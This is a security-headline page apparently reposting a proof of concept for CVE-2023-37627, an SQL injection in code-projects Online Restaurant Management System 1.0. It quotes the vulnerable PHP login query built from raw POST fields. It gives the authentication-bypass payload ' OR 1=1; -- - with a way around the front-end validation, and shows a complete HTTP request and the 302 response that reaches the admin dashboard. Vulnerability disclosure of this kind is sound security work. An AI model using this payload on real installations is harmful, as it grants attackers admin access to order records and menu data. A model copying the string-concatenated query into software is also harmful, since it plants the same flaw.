Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-37627: PoC for CVE-2023-37627

Code-projects Online Restaurant Management System 1.0 is vulnerable to SQL Injection. Through SQL injection, an attacker can bypass the admin panel and view order records, add items, delete items etc.

CVE
Open in Source
#sql#vulnerability#web#windows#apple#ubuntu#apache#java#php#chrome#webkit
Product : Online Restaurant Management System - 1.0
Vulnerability Type : SQL Injection
Vendor of Product : code-projects

Desc : An attacker can bypass the admin panel and view order records, add items, delete items etc.

Vulnerable Code

// file : index.php … $email=$_POST[‘email’]; $password=$_POST[‘password’];

$sql = "SELECT * FROM admin WHERE email=’$email’ AND password=’$password’";

$query = $pdoconn->prepare($sql); $query->execute(); $arr_login=$query->fetchAll(PDO::FETCH_ASSOC); …

POC

Admin login panel can be bypassed by giving the “password” or “username” as ' OR 1=1; – -.

SELECT * FROM admin WHERE email=’[email protected]’ AND password=’’ or 1=1; – - '

Email validation is preset in the frontend. It can be bypassed either by disabling javascript or by directly sending a POST request to admin/login-admin.php

SELECT * FROM admin WHERE email=’’ or 1=1; – -' AND password=’vulnweb’ – Injecting email field

When logging with the password ' OR 1=1; – - , we get a 302 redirect to "dashboard.php", indicating that we have bypassed the admin login.

Request

POST /RestroGirls/admin/login-admin.php HTTP/1.1
Host: 192.168.56.101
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.101
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.101/RestroGirls/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=fngds5pmj5jnvtbref6qqoskuk
Connection: close

email=vulnweb%40pwned.tld&password=%27+or+1%3D1%3B+--+-

Response

HTTP/1.1 302 Found
Date: Wed, 12 Jul 2023 01:04:04 GMT
Server: Apache/2.4.55 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: dashboard.php
Content-Length: 4
Connection: close
Content-Type: text/html; charset=UTF-8

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE